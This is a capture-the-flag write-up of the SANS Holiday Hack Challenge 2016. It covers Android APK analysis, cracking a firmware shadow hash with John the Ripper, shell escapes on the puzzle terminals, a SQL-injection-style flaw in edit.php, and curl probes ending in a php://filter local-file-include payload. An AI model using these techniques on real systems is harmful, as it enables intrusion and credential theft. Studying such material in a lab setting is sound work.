NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
[email protected]^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
[email protected]"....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ

For the moment, we have no idea what this hidden message might mean, so let’s put that to one side for now and have a look at the Instagram account.

The santawclaus Instagram account was host to three images, only one of which appears to contain information; the one of the messy desk.

center messy desk

Close inspection reveals a couple of interesting artefacts; the first is the obscured nmap scan report for the domain www.northpolewonderland.com and the other is the end of what looks like a PowerShell command on the laptop screen which seems to suggest the creation of a file with filename SantaGram_v4.2.zip.

First of all, we consult Tom Hessman in the quest world to make sure that www.northpolewonderland.com (130.211.124.143) is in scope, and he warns us that whilst this machine is part of the challenge, it should only be used for acquiring static content hosted on the webserver there, not attacked in any way.

This hints to us that as we come across filenames, it’s probably worth seeing if they are hosted on this site. If we apply this logic and attempt to fetch http://www.northpolewonderland.com/SantaGram_v4.2.zip, it seems we have correctly guessed a static asset deserving of our attention.

Attempting to extract the ZIP file reveals to us that password protection has been employed, but this is where Santa’s hidden message comes into play; the password for the archive is bugbounty. Inside, is SantaGram_4.2.apk - the social media Android application that so many of the elves in the quest world were talking about.

Part 2: Awesome Package Konveyance

Now that we have our Android application package file, SantaGram_4.2.apk, it’s time for us to dive in and see what we can discover, using a mixture of dynamic analysis and forensic work, and using the hints given to us by the folk in the quest world to guide us.

First, we load the APK into an Android emulator to see how it behaves when it is running. I chose to use Genymotion, since it was recommended in the excellent SANS blog post, Ghost in the Droid: Reverse Engineering Android Apps by Ed Skoudis.

By proxying the emulated OS’s network traffic through OWASP ZAP, and trusting ZAP’s CA certificate in the emulated OS, we can observe the app’s HTTP(S) activity. We see communication with a few endpoints as we put the app’s functionality through it’s paces:

  • ads.northpolewonderland.com (104.198.221.240)
  • analytics.northpolewonderland.com (104.198.252.157)
  • ex.northpolewonderland.com (104.154.196.33)

We will come back and analyse these individually later, but for now we can answer the question of what credentials are embedded in the APK from this dynamic analysis - a sample payload from a request to the analytics site reveals the credentials we were probably looking for:

{  
   "username": "guest",
   "password": "busyreindeer78",
   "type":     "usage",
   "activity": "SplashScreen",
   "udid":     "ae26ee9299bb87f0"
}

We will probably have to take a different approach to our analysis in order to acquire the hidden audio that we’re looking for, as it seems unlikely this is going to travel across the wire. Let’s follow the excellent advice of another SANS blog post, Mining Android Secrets (Decoding Android App Resources), once again by Ed Skoudis.

We pass our Android application through apktool in order to extract the resources contained therein. Since we know we’re looking for an audio file, we could guess that we’re looking for a file with extension .mp3 and use find -iname '*.mp3' to try and find it, which turns up res/raw/discombobulatedaudio1.mp3 (MD5 hash b7aca2f218c39b997bfd61b83856aed2).

By also examining the res/values/strings.xml resource, we see the following further endpoints referenced which will be important for part 4 of the challenge:

  • dev.northpolewonderland.com (35.184.63.245)
  • dungeon.northpolewonderland.com (35.184.47.139)

Part 3: A Fresh-Baked Holiday Pi

Back in the story world, we’ve been hard at work tracking down the parts of the Cranberry Pi. Upon acquiring the Cranberry Pi board from the hidden fireplace room, the HDMI cable from the reindeer stables (moo!), the power cord from beside the snowman, the heatsink from the loft area, and the SD card from the end of the walkway in the clouds, it is now time to revisit Holly Evergreen. She provides us with the final piece of the Cranberry Pi puzzle; a link to the firmware image, Cranbian, that runs on the pi board. She tells us that we need to recover the password for the cranpi user account in order to be able to use the pi board in the story world.

Having downloaded and extracted the cranbian.img file, we follow the advice of another convenient blog post, Mount a Raspberry Pi File System Image, again by Ed Skoudis.

Once we have the image mounted, we can grab the shadow file from /etc/shadow and use the hints provided to us by Minty Candycan in the story world by pointing John The Ripper at it using the RockYou wordlist. In no time at all, the password cracking software has recovered the cranpi user’s password; yummycookies.

Upon telling Holly Evergreen the password to the cranpi user account, we now find ourselves with the ability to interact with the various terminals that are dotted throughout the story world.

Terminal - Elf House #2

This terminal greets us with the following banner

*******************************************************************************
*                                                                             *
*To open the door, find both parts of the passphrase inside the /out.pcap file* 
*                                                                             *
*******************************************************************************

Examining the permissions of the /out.pcap file shows us that it is owned by user itchy and only they have permissions to read the file, but unfortunately our primary prompt string indicates that our shell is running the context of user scratchy.

Let’s see if we have any sudo permissions:

[email protected]:~$ sudo -l
<Matching Defaults entries for scratchy on 1fae5a6f6ac5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 1fae5a6f6ac5:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings

It would seem that we are able to run the tcpdump and strings commands as itchy without having to know our own password, how convenient. Let’s first pass the packet capture file through strings to see if there are any interesting plaintext tokens:

[email protected]:~$ sudo -u itchy strings -20 /out.pcap
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
OServer: SimpleHTTP/0.6 Python/2.7.12+
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
PContent-Length: 113
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
<input type="hidden" name="part1" value="santasli" />
DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
TServer: SimpleHTTP/0.6 Python/2.7.12+
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
3{"host_int": 266670160730277518981342002975279884847, "version": [2, 0], "displayname": "", "p
ort": 17500, "namespaces": [1149071040, 1139770785, 1357103393, 1296963687, 1139786665, 1261247
053, 1331126254, 1179166992, 1210559602, 1261612467, 1223790038, 1234538553, 1304191898, 124630
1403, 1056298300, 1207374239]}

We can see the output from a HTTP request to http://192.168.188.130/firsthalf.html which, in the response body, includes a hidden HTML field called part1 and with value santasli.

We could have a crack at the second half, which appears to be contained within the binary response body of a similar request to /secondhalf.bin, which would almost certainly require some tcpdump-fu, or we could take a (correct!) guess that the password to the door accompanying the terminal is santaslittlehelper.

Terminal - Workshop (near reindeer)

This temrinal greets us with the following banner

*******************************************************************************
*                                                                             *
* Find the passphrase from the wumpus.  Play fair or cheat; it's up to you.   * 
*                                                                             *
*******************************************************************************

We are running under the context of user elf and have a single file in our home directory, wumpus, which is an executable. For this challenge, I started out by just playing the game - it’s fairly simple to beat after all, and killed the Wumpus. I’m sorry Wumpus. WUMPUS IS MISUNDERSTOOD.

Later, I performed a more detailed analysis of the executable by encoding it as base64 out to the terminal, copying that to an isolated x86_64 Debian VM, and reverse engineering it using GDB.

We find that there are several command line options which can be supplied to the executable:

  • -a: specify number of arrows the player starts with
  • -b: specify number of bats present in the cave
  • -h: hard mode, which tightens constraints on starting positions and room/tunnel/bat/pit ratios and “last chances”
  • -p: specify number of pits present in the cave
  • -r: specify number of rooms in the cave
  • -t: specify number of tunnels in the cave

Some of these parameters have constraints applied to them, for example the number of rooms has to be greater than 5.

Using these parameters, we can cheat and make the game trivial to complete, for example by making a cave with 6 rooms and 5 tunnels, in which case we just shoot into every room from our starting room until we inevitably hit the poor Wumpus.

Terminal - Train

With this terminal, we are dropped into the “Train Management Console”. Using HELP drops us into a less session, presenting instructions on how to operate the train, along with a Cranberry pie recipe. As the instructions hint at, being in less gives us the ability to execute commands using !. Using !ls we can see the working directory contains three files: ActivateTrain, TrainHelper.txt and Train_Console.

TrainHelper.txt is presumably the file we’re reading, Train_Console is the “Train Management Console” we were dropped into in the first place, and ActivateTrain is an executable which triggers the ability to travel back in time. We can therefore call the ActivateTrain executable from the HELP context using !./ActivateTrain or we can also use strings on the console script to discover the passphrase of 24fb3e89ce2aa0ea422c3d511d40dd84 which can be used to START the train via the management console legitimately, once the brakes have been released with BRAKEOFF.

Terminal - Workshop (near staircase)

This terminal greets us with the following banner

*******************************************************************************
*                                                                             *
* To open the door, find the passphrase file deep in the directories.         * 
*                                                                             *
*******************************************************************************

Here, we use the find command to list the files and directories under the home folder recursively:

[email protected]:~/.doormat$ find
.
./. 
./. / 
./. / /\
./. / /\/\\
./. / /\/\\/Don't Look Here!
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp
./. / /\/\\/Don't Look Here!/secret
./. / /\/\\/Don't Look Here!/files
./. / /\/\\/holiday
./. / /\/\\/temp
./. / /\/santa
./. / /\/ls
./. / /opt
./. / /var
./. /bin
./. /not_here
./share
./temp

We can see the file which we are probably interested in - key_for_the_door.txt - so we use find once again combined with the -exec flag to read its contents, without having to worry about traversing the awkwardly named directories ourselves:

[email protected]:~/.doormat$ find -name 'key_for_the_door.txt' -exec cat {} \;
key: open_sesame

Terminal - Santa’s Office

This terminal drops us into another interactive script rather than a shell, and we are greet with the following famous line

GREETINGS PROFESSOR FALKEN.

This challenge requires that we answer the prompts as was done in the 1983 movie War Games, as follows:

GREETINGS PROFESSOR FALKEN.

Hello.


HOW ARE YOU FEELING TODAY?

I'm fine. How are you?


EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?

People sometimes make mistakes.


YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?


WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.


FINE

,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 
2

AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 

Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 

LOOK AT THE PRETTY LIGHTS

Press Enter To Continue

Conclusion of Part 3

Between these terminals, we are granted access to all but one door in the quest world. By using the terminal in the workshop, beside the reindeer stables, allows us into the DFER (or Dungeon For Errant Reindeer), which is empty in the present day, but contains the captive Santa Claus if we travel back to 1978 using the train terminal.

Part 4: My Gosh… It’s Full of Holes

In this part, we exploit the following targets as referenced in the SantaGram android application, and as per Tom Hessman’s confirmation that they are in-scope.

The Mobile Analytics Server #1

This server appears to be an endpoint for collecting and querying analytics data. Retrieval of the first MP3 file on this site is trivial; we log into the web application using the credentials we recovered in part 2 (guest:busyreindeer78) and are presented with a menu item at the top labeled “MP3”. Clicking this downloads discombobulatedaudio2.mp3 (MD5 hash f05c1ec6c536e455ec686973fa6b8e20).

The Mobile Analytics Server #2

Using nmap to scan the analytics server, with the standard set of scripts enabled (thanks to Holly Evergreen from the quest world for the tip) yields the revelation that the source code for the web application is hosted on the server in the form of a bare git repositry at /.git/. Recursively download this bare repository and checking it out allows us the peruse the source code for the web application in its current state, as well as viewing the history of the development of the application.

From the history, we can see that the SQL for generating the database schema and static data for the site had in it at some point a set of credentials for the administrator user (introduced in commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0 and removed in commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0):

INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');

Trying these credentials in the web application reveals that this password has not been rotated since it was commited and removed from source control, and allows us to access more of the web application’s functionality, most intrestingly the “experiemental” ability to modify saved queries against the data.

By querying the data, making sure to save it which returns us the key (a GUID) for the query, and using the edit functionality, we are able to modify the SQL statement for that question due to the way the edit.php code searches GET query parameters exhaustively for those matching the columns from the schema in the database (whilst the UI only allows editing of the query name and description. The vulnerable code is shown below:

    # Update the row with the new values
    $set = [];
    foreach($row as $name => $value) {
      print "Checking for " . htmlentities($name) . "...<br>";
      if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
      }
    }

    $query = "UPDATE `reports` " .
      "SET " . join($set, ', ') . ' ' .
      "WHERE `id`='" . mysqli_real_escape_string($db, $_REQUEST['id']) . "'";
    print htmlentities($query);

    $result = mysqli_query($db, $query);

Thus by examining the schema, specifically the audio table which holds the MP3 metadata and blobs, we are able to modify a saved query with SQL constructed such that it will divulge the contents of the table in an HTML-friendly format (base64 encoding the MP3 blob using MySQL’s handy TO_BASE64 builtin function):

SELECT id,username,filename,TO_BASE64(mp3) FROM audio;

which gives us

id username filename mp3
20c216bc-b8b1-11e6-89e1-42010af00008 guest discombobulatedaudio2.mp3 omitted
3746d987-b8b1-11e6-89e1-42010af00008 administrator discombobulatedaudio7.mp3 omitted

We can then take the base64 encoding of the discombobulatedaudio7.mp3 file (MD5 hash 313e7e370fd7d5232bb569f21856d9f4) and recover the audio file for later analysis.

The Dungeon Game

Whilst conducting our adventure is the quest world, we are told by various NPCs about a game called “Dungeon” which is played by Pepper Mintstix, who provides us with a link (http://www.northpolewonderland.com/dungeon.zip) to an old copy of the game. Downloading and extract this yields an ELF 64-bit executable called dungeon as well as what turns out to be an encrypted assets file called dtextc.dat.

Executing the dungeon file in an isolated VM indeed drops us into a game of dungeon, otherwise known as Zork, one of the earliest interactive fiction computer games.

Playing the game through to completion seems like it could waste a considerable amount of time, so let’s consider alternative approaches to beating it.

My first port of call was to download and compile a tool for decrypting the resources file. Perusing the resources file shows that even if we are able to beat the local copy of the game by getting to the room containing the elf and presenting him with an item, he will tell us that we have complete the online version - presumably located somewhere on dungeon.northpolewonderland.com.

Portscanning this host shows an unusual open port listening on TCP/11111, and surely enough by connecting to this socket with netcat we see what looks like a hosted, interactive service running a copy of dungeon.

Since we will be unable to access the hosted dtextc.dat file in which our desired information presumably lies, we will have to figure out how to complete the game only by interacting with it. Fortunately, research turns up a hidden interactive debugger built into some versions of the game called GDT, which is indeed present in the downloaded and hosted version, which we are able to use to cheat and reach the completion scenario with easy. We therefore connect to the hosted game and use the correct incantations to get the information we need, shown below:

$ nc 35.184.47.139 11111            
Welcome to Dungeon.                     This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>TK
Entry:    154
Taken.
GDT>AH
Old=      2      New= 192
GDT>exit
>look
You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa's elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
                Songs of the seasons are in many parts
                To solve a puzzle is in our hearts
                Ask not what what the answer be,
                Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.
>inventory
You are carrying:
  A jewel-encrusted egg.
>give elf egg
The elf, satisified with the trade says -
send email to "[email protected]" for that which you seek.
The elf says - you have conquered this challenge - the game will now end.
Your score is 5 [total of 585 points], in 5 moves.
This gives you the rank of Beginner.

Following the instructions and sending an e-mail to [email protected] we receive a prompt reply with the discombobulatedaudio3.mp3 file (MD5 hash 0be15d00299af1a6bc1d11ab6f2696a0) attached.

The Debug Server

From examining the SantaGram Android application string resources, we see from the following lines that the debug server endpoint is located at dev.northpolewonderland.com and, more interestingly that debug data collection is disabled by default, which would explain why we didn’t see any traffic to this endpoint whilst exercise the app as-is.

    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">false</string>

By changing this value to true, re-assembling the Android application and signing it with our own key, we are able to load the modified version of the application into our emulator. Grepping the smali for the string debug suggests that the debug-reporting behaviour should be triggered by visiting the EditProfile activity. Doing so causes the following HTTP request to be made (JSON formatting mine throughout):

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    "date": "20161218140911-0500",
    "freemem": -1,
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "udid": "91104f4f660a1469"
}

with response as follows:

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:01 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 244

{
    "date": "20161219003601",
    "status": "OK",
    "filename": "debug-20161219003601-0.txt",
    "request": {
        "date": "20161218140911-0500",
        "freemem": -1,
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "udid": "91104f4f660a1469",
        "verbose": false
    }
}

We see that the request payload is reflected back to us in the response, but includes an extra parameter that we did not specify named verbose, by crafting our own request to include this parameter with its value set to true, the server responds with a list of the reports that it has (which appear to be cleared out periodically, judging by the way the list changes over time):

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    "date": "20161218140911-0500",
    "freemem": -1,
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "udid": "91104f4f660a1469",
    "verbose": true
}    

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:21 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 691

{
    "date": "20161219003621",
    "date.len": 14,
    "status": "OK",
    "status.len": "2",
    "filename": "debug-20161219003621-0.txt",
    "filename.len": 26,
    "request": {
        "date": "20161218140911-0500",
        "freemem": -1,
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "udid": "91104f4f660a1469",
        "verbose": true
    },
    "files": [
        "debug-20161219002320-0.txt",
        "debug-20161219002349-0.txt",
        "debug-20161219002443-0.txt",
        "debug-20161219002507-0.txt",
        "debug-20161219002552-0.txt",
        "debug-20161219002648-0.txt",
        "debug-20161219003121-0.txt",
        "debug-20161219003452-0.txt",
        "debug-20161219003559-0.txt",
        "debug-20161219003601-0.txt",
        "debug-20161219003617-0.txt",
        "debug-20161219003621-0.txt",
        "debug-20161224235959-0.mp3",
        "index.php"
    ]
}

Notice debug-20161224235959-0.mp3 - this must be another discombobulated audio file! Surely enough, we can download this simply by making a GET request to http://dev.northpolewonderland.com/debug-20161224235959-0.mp3 (MD5 hash 0a5ef5d7a0e89658a833d1892a9e1ec6).

The Banner Ad Server

This endpoint, http://ads.northpolewonderland.com, is used to serve up advertisements within the SantaGram Android application. Visiting the site in a browser (with our ad-blocker disabled, as it seems to interfere with the site) reveals a web application built using the Meteor framework.

Using the information available on Ed Skoudis’s SANS blog post, Mining Meteor, we can use the TamperMonkey script MeteorMiner to inspect the routes available in the web application. Navigating to the /admin/quotes route, we notice a subscription to the adminQuotes publication, which contains amongst it’s collections an entry with a property called audio and value /ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3. Fetching this resource from http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3 gives us another audio file (MD5 hash 3d87c1d31717f81f1966db4133f9e24d).

The Uncaught Exception Handler Server

Looking at the request (truncated for brevity) and response which is sent/received by the Android application reports an unhandled exception, we see the following:

POST http://ex.northpolewonderland.com/exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; ONE A2003 Build/MMB29M)
Connection: Keep-Alive
Content-Length: 1269
Host: ex.northpolewonderland.com

{
    "operation": "WriteCrashDump",
    "data": {
        "message": "Invalid index 0, size is 0",
        ...
    }
}
 
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 15 Dec 2016 15:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "crashdump-Ez9xc2.php"
}

From here, we can fuzz the request payload and examine the server’s response to try and built a mental model of the functionality supported by this endpoint:

$ curl http://ex.northpolewonderland.com/exception.php \
    -d '{}'
Content type must be: application/json

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{}'
Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump"}'
Fatal error! JSON key 'data' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {}}'
Fatal error! JSON key 'crashdump' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2.php"}}'
Fatal error! crashdump value duplicate '.php' extension detected.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2"}}'
<<response body contains what we submitted in the dump data>>

At this point, we can start to think about what vulnerabilities might exist. As per the hints from Sugarplum Mary in the quest world, we could think about PHP I/O streams as a potential vector, and using another SANS blog post, Getting MOAR Value out of PHP Local File Include Vulnerabilities by Ed Skoudis, we can use the ReadCrashDump functionality to read the source for exception.php (with the exception being automatically added by the code on the remote end) by passing a PHP stream filter as the crashdump argument:

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"php://filter/convert.base64-encode/resource=exception"}}'

